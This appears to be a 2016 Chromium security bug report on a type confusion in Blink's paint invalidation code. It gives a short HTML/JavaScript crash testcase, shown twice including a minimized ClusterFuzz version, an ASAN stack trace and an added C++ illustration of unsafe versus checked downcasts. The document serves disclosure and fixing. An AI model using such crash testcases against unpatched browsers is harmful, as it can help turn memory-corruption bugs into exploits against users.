Security: type confusion in blink::PaintInvalidationState::updateForNormalChildren
Reported by
cloudfuz...@gmail.com,
Aug 15 2016
Issue description
VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of chrome due to a type confusion in blink::PaintInvalidationState::updateForNormalChildren
VERSION
Chrome Version: asan-linux-release-411953
Operating System: Linux
REPRODUCTION CASE
<script>
function start() {
  // Detached HTML <sup> used only as a scratch container for parsing.
  o108=document.createElementNS('http://www.w3.org/1999/xhtml','sup');
  // SVG <radialGradient> created directly, with paint containment set on it.
  o189=document.createElementNS('http://www.w3.org/2000/svg','radialGradient');
  o189.style.contain='paint';
  // Parse an inline <svg> holding an empty <style> into the scratch element.
  o108.innerHTML="<svg><style>";
  o325=o108.querySelectorAll('*')[0];   // the <svg>
  o326=o108.querySelectorAll('*')[1];   // the <style> inside it
  // Attach the <svg> to the document, then insert the gradient (between two
  // "undefined" text nodes) as a sibling before the <style>.
  document.documentElement.appendChild(o325);
  o326.before(undefined,o189,undefined);
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
ASAN output:
ASSERTION FAILED: object.isBox()
../../third_party/WebKit/Source/core/layout/LayoutBox.h(1136) : const blink::LayoutBox &blink::toLayoutBox(const blink::LayoutObject &)
1 0xcc93006
....
ASAN:DEADLYSIGNAL
=================================================================
==5810==ERROR: AddressSanitizer: SEGV on unknown address 0x00009f7537dd (pc 0x00000cc9300b bp 0x7ffe024f7b50 sp 0x7ffe024f7aa0 T0)
==5810==The signal is caused by a READ memory access.
#0 0xcc9300a in toLayoutBox third_party/WebKit/Source/core/layout/LayoutBox.h:1136:1
#1 0xcc9300a in blink::PaintInvalidationState::updateForNormalChildren() third_party/WebKit/Source/core/layout/PaintInvalidationState.cpp:317
#2 0xcc91067 in blink::PaintInvalidationState::updateForChildren(blink::PaintInvalidationReason) third_party/WebKit/Source/core/layout/PaintInvalidationState.cpp:268:5
#3 0xcf252e0 in blink::LayoutObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1256:31
#4 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#5 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#6 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#7 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#8 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#9 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#10 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#11 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#12 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#13 0xcf256cb in blink::LayoutObject::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutObject.cpp:1267:16
#14 0xcd71cf5 in blink::LayoutBox::invalidatePaintOfSubtreesIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBox.cpp:1595:27
#15 0xcdbcb93 in blink::LayoutBoxModelObject::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/layout/LayoutBoxModelObject.cpp:415:5
#16 0xc422a4a in invalidateTreeIfNeeded third_party/WebKit/Source/core/layout/api/LayoutItem.h:279:25
#17 0xc422a4a in blink::FrameView::invalidateTreeIfNeeded(blink::PaintInvalidationState const&) third_party/WebKit/Source/core/frame/FrameView.cpp:1121
#18 0xc442835 in blink::FrameView::invalidateTreeIfNeededRecursiveInternal() third_party/WebKit/Source/core/frame/FrameView.cpp:2804:9
#19 0xc43cf4a in blink::FrameView::invalidateTreeIfNeededRecursive() third_party/WebKit/Source/core/frame/FrameView.cpp:2786:5
#20 0xc43b520 in blink::FrameView::updateLifecyclePhasesInternal(blink::DocumentLifecycle::LifecycleState) third_party/WebKit/Source/core/frame/FrameView.cpp:2570:21
#21 0xc9fb544 in blink::PageAnimator::updateAllLifecyclePhases(blink::LocalFrame&) third_party/WebKit/Source/core/page/PageAnimator.cpp:85:11
#22 0xa1a0a50 in blink::WebViewImpl::updateAllLifecyclePhases() third_party/WebKit/Source/web/WebViewImpl.cpp:2017:5
#23 0x7188038 in cc::ProxyMain::BeginMainFrame(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >) cc/trees/proxy_main.cc:203:21
#24 0x71bcfe7 in Invoke<const base::WeakPtr<cc::ProxyMain> &, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > base/bind_internal.h:214:12
#25 0x71bcfe7 in MakeItSo<void (cc::ProxyMain::*const &)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), const base::WeakPtr<cc::ProxyMain> &, std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > base/bind_internal.h:303
#26 0x71bcfe7 in void base::internal::Invoker<base::internal::BindState<void (cc::ProxyMain::*)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > >, void ()>::RunImpl<void (cc::ProxyMain::* const&)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > > const&, 0ul, 1ul>(void (cc::ProxyMain::* const&)(std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> >), std::__1::tuple<base::WeakPtr<cc::ProxyMain>, base::internal::PassedWrapper<std::__1::unique_ptr<cc::BeginMainFrameAndCommitState, std::__1::default_delete<cc::BeginMainFrameAndCommitState> > > > const&, base::IndexSequence<0ul, 1ul>) base/bind_internal.h:346
#27 0x5909235 in Run base/callback.h:389:12
#28 0x5909235 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#29 0x9ee35d4 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue(blink::scheduler::internal::WorkQueue*, blink::scheduler::internal::TaskQueueImpl::Task*) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:315:19
#30 0x9edef83 in blink::scheduler::TaskQueueManager::DoWork(base::TimeTicks, bool) third_party/WebKit/Source/platform/scheduler/base/task_queue_manager.cc:218:13
#31 0x5909235 in Run base/callback.h:389:12
#32 0x5909235 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask const&) base/debug/task_annotator.cc:54
#33 0x575e055 in base::MessageLoop::RunTask(base::PendingTask const&) base/message_loop/message_loop.cc:488:19
#34 0x575ee4f in base::MessageLoop::DeferOrRunPendingTask(base::PendingTask) base/message_loop/message_loop.cc:497:5
#35 0x576048a in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:621:13
#36 0x576a4bd in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:35:31
#37 0x57d5129 in base::RunLoop::Run() base/run_loop.cc:35:10
#38 0x947f0f0 in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:198:23
#39 0x3ec8027 in content::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) content/app/content_main_runner.cc:343:14
#40 0x3ecc805 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner.cc:785:12
#41 0x3eb12bd in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:20:28
#42 0x513402 in main content/shell/app/shell_main.cc:48:10
#43 0x7f9b1fc3282f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV third_party/WebKit/Source/core/layout/LayoutBox.h:1136:1 in toLayoutBox
==5810==ABORTING
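The trace above ends in toLayoutBox asserting object.isBox() on an object that is not a box. The C++ below is an added example, not Blink code and not part of the report: it models that downcast pattern with invented classes (the names echo LayoutObject, LayoutBox and toLayoutBox for readability; the geometry fields, the LayoutSVGResourceStub class and the tree are assumptions) and puts an assert-only cast beside a cast whose check survives in every build.

```cpp
// Added illustration (not Blink code): a minimal model of the downcast
// pattern in the trace above. Names mirror LayoutObject/LayoutBox/toLayoutBox
// only for readability; the fields, the tree and the SVG-resource stub are
// invented for the example.
#include <cassert>
#include <cstdio>
#include <memory>
#include <utility>
#include <vector>

class LayoutObject {
 public:
  virtual ~LayoutObject() = default;
  virtual bool isBox() const { return false; }
  virtual const char* name() const = 0;
  void appendChild(std::unique_ptr<LayoutObject> child) {
    children_.push_back(std::move(child));
  }
  const std::vector<std::unique_ptr<LayoutObject>>& children() const {
    return children_;
  }

 private:
  std::vector<std::unique_ptr<LayoutObject>> children_;
};

// A box: carries geometry that non-box layout objects do not have.
class LayoutBox : public LayoutObject {
 public:
  LayoutBox(int width, int height) : width_(width), height_(height) {}
  bool isBox() const override { return true; }
  const char* name() const override { return "LayoutBox"; }
  int width() const { return width_; }
  int height() const { return height_; }

 private:
  int width_;
  int height_;
};

// Hypothetical stand-in for a non-box layout object (the real Blink type
// behind <radialGradient> is not modelled here).
class LayoutSVGResourceStub : public LayoutObject {
 public:
  const char* name() const override { return "LayoutSVGResourceStub"; }
};

// Pattern A, the shape toLayoutBox has in the trace: the type check is an
// assertion. In a build with assertions compiled out the check disappears and
// static_cast reinterprets a non-box as a LayoutBox, so width()/height() read
// memory that belongs to some other field or to nothing at all.
inline const LayoutBox& toLayoutBoxUnchecked(const LayoutObject& object) {
  assert(object.isBox());
  return static_cast<const LayoutBox&>(object);
}

// Pattern B: the check is part of the contract in every build and the caller
// must handle the non-box case.
inline const LayoutBox* toLayoutBoxOrNull(const LayoutObject& object) {
  return object.isBox() ? static_cast<const LayoutBox*>(&object) : nullptr;
}

struct ChildScan {
  int boxes = 0;
  int nonBoxesSkipped = 0;
  long boxArea = 0;
};

// Walks a parent's children the way a paint-invalidation pass might, touching
// geometry only on children that really are boxes.
ChildScan scanChildren(const LayoutObject& parent) {
  ChildScan scan;
  for (const auto& child : parent.children()) {
    if (const LayoutBox* box = toLayoutBoxOrNull(*child)) {
      ++scan.boxes;
      scan.boxArea += static_cast<long>(box->width()) * box->height();
    } else {
      ++scan.nonBoxesSkipped;  // a Pattern A caller would have cast this
    }
  }
  return scan;
}

// Constructed tree: a box parent with one box child and one non-box child,
// the mixed-sibling situation the reproduction above sets up.
std::unique_ptr<LayoutObject> buildMixedTree() {
  std::unique_ptr<LayoutObject> root = std::make_unique<LayoutBox>(100, 50);
  root->appendChild(std::make_unique<LayoutBox>(20, 10));
  root->appendChild(std::make_unique<LayoutSVGResourceStub>());
  return root;
}

ChildScan scanMixedTree() { return scanChildren(*buildMixedTree()); }

int main() {
  ChildScan scan = scanMixedTree();
  std::printf("boxes=%d skipped=%d area=%ld\n", scan.boxes,
              scan.nonBoxesSkipped, scan.boxArea);
  // toLayoutBoxUnchecked(*buildMixedTree()->children()[1]) would trip the
  // assert here, and is undefined behaviour once NDEBUG removes it.
  return 0;
}
```

The point of the comparison: a type check that exists only inside an assertion is a debugging aid, not a security boundary. The checked cast costs one virtual call per child and turns the same input into a skipped node instead of an out-of-bounds read.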
Aug 15 2016
Thanks for the report! However, it looks like our internal fuzzers found this 2 days ago.
Aug 15 2016
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=4884309901312000

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: ASSERT
Crash Address:
Crash State:
  object.isBox()
  blink::PaintInvalidationState::updateForNormalChildren
  blink::PaintInvalidationState::updateForChildren

Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=411529:411875

Minimized Testcase (0.41 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv97ksZOsBdY8EvXgw0cAv8dIYELoQrRSjSzl2Lg1hnNcDQRi_Wfd_0fohaUkPCHdt2ITnKFoyK2bgC5KTtA_hFbDjQJkMz9SULWikiJNNMg9NO4LIKem5CV1JzrUYTvZj_CXy9yw1hEZThDP45Litu_uSbd0_w?testcase_id=4884309901312000

<script>
o108=document.createElementNS('http://www.w3.org/1999/xhtml','sup');
o189=document.createElementNS('http://www.w3.org/2000/svg','radialGradient');
o189.style.contain='paint';
o108.innerHTML="<svg><style>";
o325=o108.querySelectorAll('*')[0];
o326=o108.querySelectorAll('*')[1];
document.documentElement.appendChild(o325);
o326.before(o189);
</script>

See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.
Nov 24 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot